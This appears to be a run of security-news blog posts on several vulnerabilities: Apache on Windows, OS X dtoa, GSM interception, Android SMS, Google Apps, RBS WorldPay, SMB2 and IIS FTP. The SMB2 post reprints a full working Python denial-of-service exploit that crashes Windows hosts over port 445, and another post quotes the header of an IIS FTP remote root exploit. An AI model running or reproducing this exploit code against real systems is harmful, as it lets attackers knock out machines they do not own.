There was a new vulnerability announced today in Apache webserver. This affects all versions of the popular webserver software platform running on Windows operating systems.
From ZDNet Australia:
“The vulnerability means that you can take complete control of the web server remotely with system privileges — which is the highest privilege on Windows,” Edelstein told ZDNet.com.au. “An attacker could gain access to, modify and take away data.”
Edelstein advised users running Apache on Windows platforms to upgrade immediately as users have no way of knowing if their web servers have been compromised. The company’s security advisory can be accessed here.
“Whilst in the past it was more overt and attackers would deface website pages, they’re more likely now to conceal their access to maintain their foothold,” said Edelstein, giving examples of attackers potentially exploiting the vulnerability by placing hidden pieces of code to capture credit card details from online transactions and install root kits on compromised websites.
Although, I do find it odd that people would be running Apache on Windows for anything other than a lab instance. But, that’s just me.
(Image used under CC from Hans Gerwitz)
This was an email that was sent by Adobe to one of the readership just yesterday. Too funny. Especially when you take into mind this and of course these. Not to mention the fun with TSA just a little while ago.
Enjoy your Friday.
Thanks to hvnsnt for sharing that one. Here is a larger copy of the image. Just click on the thumbnail.
Here is an interesting one. Apparently a vulnerability that was reported roughly 8 months ago still haunts OS X.
From ITWire:
A widespread security vulnerability disclosed eight months ago is apparently still lurking in Mac OS X 10.5 and 10.6. A pair of security researchers have released a proof of concept exploit.
Maksymilian Arciemowicz and ’sp3x’ of SecurityReason.com have publicly disclosed a proof of concept exploit for a vulnerability in Mac OS X’s dtoa function that converts double-precision values to ASCII strings.
They say they reported the issue eight months ago.
The proof of concept merely triggers a memory access error, but such buffer overflow conditions can sometimes be exploited to run arbitrary code.
Hmm. Arbitrary code you say? That sounds less than appealing.
Read on.
(Image used under CC from photograham Flickr stream)
There is this damn breathing noise I hear on the line everytime I make a phone call from my cell.
What’s that? It was Paget and Nohl?
…oh!
From The Register:
At a hacker conference in Berlin that runs through Wednesday, the cryptographers said they’ve cracked the algorithm that determines the random channel hopping and have devised a practical means to capture entire calls using equipment that costs about $4,000. At the heart of the crack is open-source software for computer-controlled radios that makes the frequency changes at precisely the same time, and in the same order, that the cellphone and base station do.
“We now know this is possible,” said Karsten Nohl, a 28-year-old cryptographer and one of the members of an open-source project out to prove that GSM, the technical standard used by about 80 percent of the mobile market, can’t be counted on to keep calls private. The attack “is practical, and there are real vulnerabilities that people are exploiting.”
Ouch!
Yet another reason on the long list of “Why the hell am I not in Berlin?”.
For the full article read on.
Also, here’s where you can find a copy of the presentation at 26c3. And yes, the video of the preso is available on torrent sites. 1 2 and 3
There are a couple of problems with the Android phone in the new this evening. The first of which concerns how Android processes SMS messages.
Hmm. Why does this one ring a bell?
From oCERT:
a specific malformed SMS message can be crafted to trigger a condition that disconnects the mobile phone from the cellular network. The malformed SMS message consists of a badly formatted WAP Push message which causes an Java ArrayIndexOutOfBoundsException in the phone application (android.com.phone).
The other problem involves a denial of service problem with the Dalvik API.
A specific malicious application can be crafted so that if it is downloaded and executed by the user, it would trigger the vulnerable API function and restart the system process. The same condition could occur if a developer unintentionally places the vulnerable function in a place where the execution path leads to that function call. Triggering this bug is considered a DoS condition.
Congrats to researchers Charlie Miller, Collin Mulliner and Emmanouel Kellinis. Patches have been released by the vendor for both of these issues.
Ah, its raining in Mountain View today. Well, at least in one building. It turns out that’s there is a a vulnerability in Google Apps that can lead to a local compromise of a users system. Apparently, this can lead to non-privileged code execution.
Um, yeah.
From retrogod:
google apps googleapps.url.mailto:// uri handler cross-browser remote command execution exploit (Internet Explorer)
by nine:situations:group::pyrokinesis
site: http://retrogod.altervista.org/software site: http://pack.google.com/intl/it/pack_installer.html
tested against: Internet Explorer 8, windows xp sp3
Internet Explorer 7, windows xp sp3
Google Chrome 2.0.172.43vulnerability: through the vulnerable googleapps.url.mailto:// deprecated uri handler, registered as follows:
There is a proof of concept on the site as well.
Doesn’t really give folks in Los Angeles a warm and fuzzy one would imagine.
Royal Bank of Scottland Group might be feeling a bit exposed this afternoon…
RBS WorldPay, a system that processes millions of payments daily has been compromised. It looks like the database is just dying to give up names, credit card numbers, email addresses, and all sorts of juicy information to whoever asks for it. Unu has a great write up of the vulnerability with plenty of juicy screenshots on his blog.
Here is a real kicker for you:
The next picture is awesome, but really what we see. In the picture appear user, host and password in mysql database, user table. But look well to the first user webphp, surrounded me. We have % to host and NOTHING in the password !!! I mean we have a user password NULL and % to host, that means that we can log on his account, the MySQL server without password, from any IP.
There is also some fun poked at Bill Gates which never hurts.
You know, sometimes you just have to laugh as the pain gets to be too much.
From Full Disclosure:
SRV2.SYS fails to handle malformed SMB headers for the NEGOTIATE PROTOCOL REQUEST functionnality.
The NEGOTIATE PROTOCOL REQUEST is the first SMB query a client send to a SMB server, and it’s used to identify the SMB dialect that will be used for futher communication.
Oh, but there’s more. Proof of concept anyone?
Yup, got that as well over on FD.
Smb-Bsod.py:
#!/usr/bin/python
# When SMB2.0 recieve a “&” char in the “Process Id High” SMB header field it dies with a
# PAGE_FAULT_IN_NONPAGED_AREA from socket import socket
from time import sleephost = “IP_ADDR”, 445
buff = (
“\x00\x00\x00\x90″ # Begin SMB header: Session message
“\xff\x53\x4d\x42″ # Server Component: SMB
“\x72\x00\x00\x00″ # Negociate Protocol
“\x00\x18\x53\xc8″ # Operation 0×18 & sub 0xc853
“\x00\x26″# Process ID High: –>
“\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xfe”
“\x00\x00\x00\x00\x00\x6d\x00\x02\x50\x43\x20\x4e\x45\x54″
“\x57\x4f\x52\x4b\x20\x50\x52\x4f\x47\x52\x41\x4d\x20\x31″
“\x2e\x30\x00\x02\x4c\x41\x4e\x4d\x41\x4e\x31\x2e\x30\x00″
“\x02\x57\x69\x6e\x64\x6f\x77\x73\x20\x66\x6f\x72\x20\x57″
“\x6f\x72\x6b\x67\x72\x6f\x75\x70\x73\x20\x33\x2e\x31\x61″
“\x00\x02\x4c\x4d\x31\x2e\x32\x58\x30\x30\x32\x00\x02\x4c”
“\x41\x4e\x4d\x41\x4e\x32\x2e\x31\x00\x02\x4e\x54\x20\x4c”
“\x4d\x20\x30\x2e\x31\x32\x00\x02\x53\x4d\x42\x20\x32\x2e”
“\x30\x30\x32\x00″)
s = socket()s.connect(host)
s.send(buff)
s.close()
UPDATE: Here is some more info on this from the site Reverse Mode.
(Image used under CC from ian-s Flickr feed)
This Monday continues to get weirder by the minute. Well, in keeping with that here is a zeroday that just made it on to the Full Disclosure mailing list.
Microsoft Internet Information Server 5.0/6.0
FTP Server Remote Stack Based Overrun
# IIS 5.0 FTPd / Remote r00t exploit
# Win2k SP4 targets
# bug found & exploited by Kingcope, kcope2googlemail.com
# Affects IIS6 with stack cookie protection
# August 2009 – KEEP THIS 0DAY PRIV8
use IO::Socket;
The full exploit is posted to the site as a PDF file and for those that are unsure here is the VirusTotal scan of the file. Bearing in mind that this is by no means a guarantee of its safety.
[UPDATE]: Microsoft released a workaround for this problem today (Sept. 1, 2009)
Tags: IIS5 Exploit, IIS6 Exploit, Zeroday, 0day, Stack Overflow
As noticed by one of our loyal readers – thanks ax0n!
Yes, the ad server puts up all kinds of ads, up to and including full flash ads. And we LOVE our advertisers.
And yes, we hope y’all are enjoying the schadenfreude of the situation.
I’m down to counting HOURS until departure for Blackhat / SecurityBSides / Neighborcon / DEFCON / ZOMG!VEGAS!!!!1!!!
Hope to see you all there – note that there is a ton of LSD shwag this year, so it would be good to memorize the faces on the About page.
